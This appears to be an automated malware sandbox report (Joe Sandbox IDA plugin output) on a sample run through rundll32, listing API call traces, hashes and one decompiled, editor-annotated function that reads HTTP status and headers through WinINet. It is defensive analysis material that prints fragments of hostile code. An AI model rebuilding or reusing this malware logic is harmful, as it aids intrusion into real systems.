                                          • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 908044853-0
                                          • Opcode ID: 6447758d77d6f4373b680673c29cc53c5a1026ff25a45b509320c56f47701cad
                                          • Instruction ID: 121dafa82c0f94f2fbfaec22b0c3474883f4ab559038d715147735ab0bc119a4
                                          • Opcode Fuzzy Hash: 6447758d77d6f4373b680673c29cc53c5a1026ff25a45b509320c56f47701cad
                                          • Instruction Fuzzy Hash: 4231E432A44254EBCB11AFA4EC84BAD7AF8EB44752F2140E5FE09E7150DF748E85CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 00B5423D
                                          • StrTrimA.SHLWAPI(?,?), ref: 00B5425B
                                          • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 00B542C4
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 00B542E5
                                          • DeleteFileA.KERNEL32(?,00003219), ref: 00B54307
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B54316
                                          • HeapFree.KERNEL32(00000000,?,00003219), ref: 00B5432E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                          • String ID:
                                          • API String ID: 1078934163-0
                                          • Opcode ID: 537fa9aa9fd551ba0445b97f707805a923b65d66614f95703ecf912c7f24e2fb
                                          • Instruction ID: 569e04b1d83468bf105074db98be0fa32df985826c1cf82ad8d251cef8437b2e
                                          • Opcode Fuzzy Hash: 537fa9aa9fd551ba0445b97f707805a923b65d66614f95703ecf912c7f24e2fb
                                          • Instruction Fuzzy Hash: AD310532104219BFE710EB64DC04F6B77E8EF45706F050498FA48E7160DB65ED89CBA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00B6043C,00000000), ref: 00B60162
                                          • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 00B60177
                                          • memset.NTDLL ref: 00B60184
                                          • HeapFree.KERNEL32(00000000,00000000,?,00B6043B,?,?,00000000,?,00000000,00B67364,?,00000000), ref: 00B601A1
                                          • memcpy.NTDLL(?,?,00B6043B,?,00B6043B,?,?,00000000,?,00000000,00B67364,?,00000000), ref: 00B601C2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Allocate$Freememcpymemset
                                          • String ID: chun
                                          • API String ID: 2362494589-3058818181
                                          • Opcode ID: 619a1ec7b4b9a0f57766fb127e4d8cc6ba8b18d9ad53ad08bf9f5110487ce0a4
                                          • Instruction ID: 0eb0cc8636822327441a03154d4eee785d3b238a755ff2f7dba3001be178fce2
                                          • Opcode Fuzzy Hash: 619a1ec7b4b9a0f57766fb127e4d8cc6ba8b18d9ad53ad08bf9f5110487ce0a4
                                          • Instruction Fuzzy Hash: 10318C71200706AFDB309F66DC84A67BBECEF55310F0184AAF94AD7621DB70E945CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                           			/* Decompiler output (comments added by the editor; field roles are inferred from use below):
                                           			   the request context in esi carries +0x18 hRequest, +0x1c an event handle,
                                           			   +0x28 an error code stored by another thread, +0x2c the HTTP status code
                                           			   and +0xc the raw response headers once read. */
                                           			E04895F21(void* __ecx, void* __esi) {
                                           				long _v8;
                                           				long _v12;
                                           				long _v16;
                                           				long _v20;
                                           				long _t34;
                                           				long _t39;
                                           				long _t42;
                                           				long _t56;
                                           				void* _t58;
                                           				void* _t59;
                                           				void* _t61;
                                           
                                           				_t61 = __esi;
                                           				_t59 = __ecx;
                                           				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                           				do {
                                           					/* non-blocking check of the completion event (timeout 0) */
                                           					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                           					_v20 = _t34;
                                           					if(_t34 != 0) {
                                           						L3:
                                           						_v8 = 4;
                                           						_v16 = 0;
                                           						/* 0x20000013 = HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_STATUS_CODE: status code as a 4-byte number */
                                           						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                                           							_t39 = GetLastError();
                                           							_v12 = _t39;
                                           							/* 0x2ef3 = ERROR_INTERNET_INCORRECT_HANDLE_STATE (12019): headers not yet available, keep waiting */
                                           							if(_v20 == 0 || _t39 != 0x2ef3) {
                                           								L15:
                                           								return _v12;
                                           							} else {
                                           								goto L11;
                                           							}
                                           						}
                                           						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                                           							goto L11;
                                           						} else {
                                           							_v16 = 0;
                                           							_v8 = 0;
                                           							/* 0x16 = HTTP_QUERY_RAW_HEADERS_CRLF: first call sizes the buffer, second call fills it */
                                           							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                                           							_t58 = E04894DF6(_v8 + 1); /* heap allocation, returns 0 on failure */
                                           							if(_t58 == 0) {
                                           								_v12 = 8; /* ERROR_NOT_ENOUGH_MEMORY */
                                           							} else {
                                           								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                                           									E04894C73(_t58); /* frees the buffer (RtlFreeHeap, see subcall list below) */
                                           									_v12 = GetLastError();
                                           								} else {
                                           									 *((char*)(_t58 + _v8)) = 0; /* NUL-terminate the header block */
                                           									 *(_t61 + 0xc) = _t58;
                                           								}
                                           							}
                                           							goto L15;
                                           						}
                                           					}
                                           					/* event was signalled: re-signal it and pick up the error stored by the other side */
                                           					SetEvent( *(_t61 + 0x1c));
                                           					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                           					_v12 = _t56;
                                           					if(_t56 != 0) {
                                           						goto L15;
                                           					}
                                           					goto L3;
                                           					L11:
                                           					/* wait up to 0xea60 = 60000 ms (60 s) on the event before polling again */
                                           					_t42 = E04893A6F( *(_t61 + 0x1c), _t59, 0xea60);
                                           					_v12 = _t42;
                                           				} while (_t42 == 0);
                                           				goto L15;
                                           			}

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,76DC81D0), ref: 04895F38
                                          • SetEvent.KERNEL32(?), ref: 04895F48
                                          • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04895F7A
                                          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04895F9F
                                          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04895FBF
                                          • GetLastError.KERNEL32 ref: 04895FD1
                                            • Part of subcall function 04893A6F: WaitForMultipleObjects.KERNEL32(00000002,04897B35,00000000,04897B35,?,?,?,04897B35,0000EA60), ref: 04893A8A
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          • GetLastError.KERNEL32(00000000), ref: 04896006
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                           • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                           • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                           • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                           • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 3369646462-0
                                          • Opcode ID: 9d39a1a330f85ff051b0f9b30beb39d6779fe6cf543cbea42f0e9f0bd634067c
                                          • Instruction ID: 5517b4c15f19345898544039f4f8e4924a9b4fce6ade04d8d8fbf08f6181e396
                                          • Opcode Fuzzy Hash: 9d39a1a330f85ff051b0f9b30beb39d6779fe6cf543cbea42f0e9f0bd634067c
                                          • Instruction Fuzzy Hash: B1310EB5900B09FFDF21EFA5C8C499EB7F8EB08314F144E69E502E2241E771AE499B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          • lstrlen.KERNEL32(00000000,?,00000F00), ref: 00B543F3
                                            • Part of subcall function 00B5B865: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,00B54417,?,00000000,000000FF,?,00000F00), ref: 00B5B876
                                            • Part of subcall function 00B5B865: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,00B54417,?,00000000,000000FF,?,00000F00), ref: 00B5B87D
                                            • Part of subcall function 00B5B865: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 00B5B88F
                                            • Part of subcall function 00B5B865: _snprintf.NTDLL ref: 00B5B8B5
                                            • Part of subcall function 00B5B865: _snprintf.NTDLL ref: 00B5B8E9
                                            • Part of subcall function 00B5B865: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 00B5B906
                                          • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 00B5448D
                                          • HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 00B544AA
                                          • DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000000,000000FF,?,00000F00), ref: 00B544B2
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF,?,00000F00), ref: 00B544C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                          • String ID: s:
                                          • API String ID: 2960378068-2363032815
                                          • Opcode ID: 3a93056fe9d4302c28e5245c93ca33bc6313bc720cce597822e588607e0a3eba
                                          • Instruction ID: e8d4ac59a676c9f9eeb941e74db8faadb62d793ec2a25ad3f51871872374fbf2
                                          • Opcode Fuzzy Hash: 3a93056fe9d4302c28e5245c93ca33bc6313bc720cce597822e588607e0a3eba
                                          • Instruction Fuzzy Hash: A6314D72900209AFDF10ABE9DC84FDE7BECEB08316F000595FA19E3251EB749A448B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 00B613E2
                                          • lstrcmpiW.KERNEL32(00000000,?), ref: 00B6141A
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00B6142F
                                          • lstrlenW.KERNEL32(?), ref: 00B61436
                                          • CloseHandle.KERNEL32(?), ref: 00B6145E
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 00B6148A
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B614A8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                          • String ID:
                                          • API String ID: 1496873005-0
                                          • Opcode ID: f58e599a6052f834873ad1bd214481767f20cedb5843209fbcc5adad630a792b
                                          • Instruction ID: 7d0f6e48cc02af35f9cc2be4b0993165e623aed33e4b5b65ac3a4f03fa423f92
                                          • Opcode Fuzzy Hash: f58e599a6052f834873ad1bd214481767f20cedb5843209fbcc5adad630a792b
                                          • Instruction Fuzzy Hash: D0212A71900205BFEB209FA9DC88EAA77FCEF14341B0848A4EA06A3221DF35DD458F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(00B61B23,00000000,00B79440,00B79460,?,?,00B61B23,00B6C387,00B79440), ref: 00B6A816
                                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00B6A82C
                                          • lstrlen.KERNEL32(00B6C387,?,?,00B61B23,00B6C387,00B79440), ref: 00B6A834
                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B6A840
                                          • lstrcpy.KERNEL32(00B79440,00B61B23), ref: 00B6A856
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00B61B23,00B6C387,00B79440), ref: 00B6A8AA
                                          • HeapFree.KERNEL32(00000000,00B79440,?,?,00B61B23,00B6C387,00B79440), ref: 00B6A8B9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                          • String ID:
                                          • API String ID: 1531811622-0
                                          • Opcode ID: 32303d7455df91f2029957c1f6a91adc8c37a82b200c7a4fc84560710e9e06a3
                                          • Instruction ID: abd441f73fa84f79f37b19fbcb0102afc2b152deba63a262cacff793e12c6011
                                          • Opcode Fuzzy Hash: 32303d7455df91f2029957c1f6a91adc8c37a82b200c7a4fc84560710e9e06a3
                                          • Instruction Fuzzy Hash: E4210B35104244BFFF124F68DC84FAA7FAAEF86310F144099F949A7261CB359C86CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenW.KERNEL32(00000000,?,?,?), ref: 00B62CA8
                                            • Part of subcall function 00B599C2: lstrcpy.KERNEL32(-000000FC,00000000), ref: 00B599FC
                                            • Part of subcall function 00B599C2: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 00B59A0E
                                            • Part of subcall function 00B599C2: GetTickCount.KERNEL32 ref: 00B59A19
                                            • Part of subcall function 00B599C2: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 00B59A25
                                            • Part of subcall function 00B599C2: lstrcpy.KERNEL32(00000000), ref: 00B59A3F
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • lstrcpy.KERNEL32(00000000), ref: 00B62CE3
                                          • wsprintfA.USER32 ref: 00B62CF6
                                          • GetTickCount.KERNEL32 ref: 00B62D0B
                                          • wsprintfA.USER32 ref: 00B62D20
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                          • String ID: "%S"
                                          • API String ID: 1152860224-1359967185

                                          APIs
                                            • Part of subcall function 00B539E2: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B539EE
                                            • Part of subcall function 00B539E2: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00B53A04
                                            • Part of subcall function 00B539E2: _snwprintf.NTDLL ref: 00B53A29
                                            • Part of subcall function 00B539E2: CreateFileMappingW.KERNEL32(000000FF,00B79208,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 00B53A45
                                            • Part of subcall function 00B539E2: GetLastError.KERNEL32 ref: 00B53A57
                                            • Part of subcall function 00B539E2: CloseHandle.KERNEL32(00000000), ref: 00B53A8F
                                          • UnmapViewOfFile.KERNEL32(?), ref: 00B5646F
                                          • CloseHandle.KERNEL32(?), ref: 00B56478
                                          • SetEvent.KERNEL32(?), ref: 00B564BF
                                          • GetLastError.KERNEL32(00B5EC0C,00000000,00000000), ref: 00B564EE
                                          • CloseHandle.KERNEL32(00000000,00B5EC0C,00000000,00000000), ref: 00B564FE
                                            • Part of subcall function 00B65F3B: lstrlenW.KERNEL32(?,74DB06E0,00B72F1B,80000001,?,?,00B5C229,?,?,00B540AD,00000000,?,00000000,?), ref: 00B65F47
                                            • Part of subcall function 00B65F3B: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,00B5C229,?,?,00B540AD,00000000,?,00000000,?), ref: 00B65F6F
                                            • Part of subcall function 00B65F3B: memset.NTDLL ref: 00B65F81
                                          Similarity
                                          • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                          • String ID: v
                                          • API String ID: 1106445334-1801730948

                                          APIs
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00001ED2,00000000,000000B7,?,00000001,00B57F67,00000000,00000000,00000011), ref: 00B563B2
                                          • HeapFree.KERNEL32(00000000,00000000,00001ED2,00000000,000000B7,?,00000001,00B57F67,00000000,00000000,00000011), ref: 00B56425
                                          Similarity
                                          • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                          • String ID:
                                          • API String ID: 2078930461-0

                                          APIs
                                            • Part of subcall function 00B6684C: lstrlen.KERNEL32(00000000,00000000,7477C740,76DC81D0,?,?,?,00B5A203,?,00000000,76DC81D0,?,?,00B5ACCC,00000000,0614C310), ref: 00B668B3
                                            • Part of subcall function 00B6684C: sprintf.NTDLL ref: 00B668D4
                                          • lstrlen.KERNEL32(00000000,7477C740,?,00000000,76DC81D0,?,?,00B5ACCC,00000000,0614C310), ref: 00B5A215
                                          • lstrlen.KERNEL32(?,?,?,00B5ACCC,00000000,0614C310), ref: 00B5A21D
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • strcpy.NTDLL ref: 00B5A234
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B5A23F
                                            • Part of subcall function 00B52644: lstrlen.KERNEL32(?,?,?), ref: 00B52655
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,?,?,00B5ACCC,00000000,0614C310), ref: 00B5A25C
                                            • Part of subcall function 00B6E5A9: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00B5A268,00000000,?,?,00B5ACCC,00000000,0614C310), ref: 00B6E5B3
                                            • Part of subcall function 00B6E5A9: _snprintf.NTDLL ref: 00B6E611
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586

                                          APIs
                                          • SwitchToThread.KERNEL32(?,?,00B63ED5), ref: 00B6E88E
                                          • CloseHandle.KERNEL32(?,?,00B63ED5), ref: 00B6E89A
                                          • CloseHandle.KERNEL32(00000000,76DDF720,?,00B54545,00000000,?,?,?,00B63ED5), ref: 00B6E8AC
                                          • memset.NTDLL ref: 00B6E8C3
                                          • memset.NTDLL ref: 00B6E8DA
                                          • memset.NTDLL ref: 00B6E8F1
                                          • memset.NTDLL ref: 00B6E908
                                          Similarity
                                          • API ID: memset$CloseHandle$SwitchThread
                                          • String ID:
                                          • API String ID: 3699883640-0

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B690C8
                                          • wcstombs.NTDLL ref: 00B690D9
                                            • Part of subcall function 00B60052: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,00B56025,00000000,?,00000000,?,?,?,?,?,?), ref: 00B60064
                                            • Part of subcall function 00B60052: StrChrA.SHLWAPI(?,00000020,?,00000000,00B56025,00000000,?,00000000,?,?,?,?,?,?), ref: 00B60073
                                          • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 00B690FA
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B69109
                                          • CloseHandle.KERNEL32(00000000), ref: 00B69110
                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00B6911F
                                          • WaitForSingleObject.KERNEL32(00000000), ref: 00B6912F
                                          Similarity
                                          • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                                          • String ID:
                                          • API String ID: 417118235-0

                                          APIs
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          • lstrcpy.KERNEL32(-000000FC,00000000), ref: 00B599FC
                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 00B59A0E
                                          • GetTickCount.KERNEL32 ref: 00B59A19
                                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 00B59A25
                                          • lstrcpy.KERNEL32(00000000), ref: 00B59A3F
                                          Similarity
                                          • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                          • String ID: \Low
                                          • API String ID: 1629304206-4112222293

                                          APIs
                                          • wsprintfA.USER32 ref: 00B63685
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 00B63697
                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 00B636C1
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B636D4
                                          • CloseHandle.KERNEL32(?), ref: 00B636DD
                                          Similarity
                                          • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                                          • String ID: 0x%08X
                                          • API String ID: 603522830-3182613153

                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • GetLastError.KERNEL32(?,?,?,00001000,?,00B79314,76DDF750), ref: 00B61E7E
                                          • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00B79314,76DDF750), ref: 00B61F03
                                          • CloseHandle.KERNEL32(00000000,?,00B79314,76DDF750), ref: 00B61F1D
                                          • OpenProcess.KERNEL32(00100000,00000000,00000000,?,?,?,00B79314,76DDF750), ref: 00B61F52
                                            • Part of subcall function 00B6012F: RtlReAllocateHeap.NTDLL(00000000,?,?,00B5171E), ref: 00B6013F
                                          • WaitForSingleObject.KERNEL32(?,00000064,?,00B79314,76DDF750), ref: 00B61FD4
                                          • CloseHandle.KERNEL32(F0FFC983,?,00B79314,76DDF750), ref: 00B61FFB
                                          Similarity
                                          • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                          • String ID:
                                          • API String ID: 3115907006-0

                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • FileTimeToLocalFileTime.KERNEL32(00000000,?), ref: 00B59C55
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B59C63
                                          • lstrlenW.KERNEL32(00000010), ref: 00B59C73
                                          • lstrlenW.KERNEL32(00000218), ref: 00B59C7F
                                          • FileTimeToLocalFileTime.KERNEL32(00000001,?), ref: 00B59D6C
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B59D7A
                                          Similarity
                                          • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                                          • String ID:
                                          • API String ID: 1122361434-0

                                          APIs
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,00000000,76D869A0,?,00000250,?,00000000), ref: 00B55A60
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,?,00000000), ref: 00B55A6C
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55AB4
                                            • Part of subcall function 00B55A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55ACF
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(0000002C), ref: 00B55B07
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?), ref: 00B55B0F
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55B32
                                            • Part of subcall function 00B55A14: wcscpy.NTDLL ref: 00B55B44
                                          • WaitForSingleObject.KERNEL32(00000000,?,06149998,?,00000000,00000000,00000001), ref: 00B5ECB6
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B5ECF0
                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 00B5ED13
                                          • RegCloseKey.ADVAPI32(?), ref: 00B5ED1C
                                          • WaitForSingleObject.KERNEL32(00000000), ref: 00B5ED80
                                          • RtlExitUserThread.NTDLL(?), ref: 00B5EDB6
                                            • Part of subcall function 00B713BB: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,00B6A2F0,00000000,?,?), ref: 00B713D9
                                            • Part of subcall function 00B713BB: GetFileSize.KERNEL32(00000000,00000000,?,?,00B6A2F0,00000000,?,?,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B713E9
                                            • Part of subcall function 00B713BB: CloseHandle.KERNEL32(000000FF,?,?,00B6A2F0,00000000,?,?,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B7144B
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 00B534C6
                                            • Part of subcall function 00B53486: GetLastError.KERNEL32 ref: 00B534D0
                                            • Part of subcall function 00B53486: WaitForSingleObject.KERNEL32(000000C8), ref: 00B534F5
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B53518
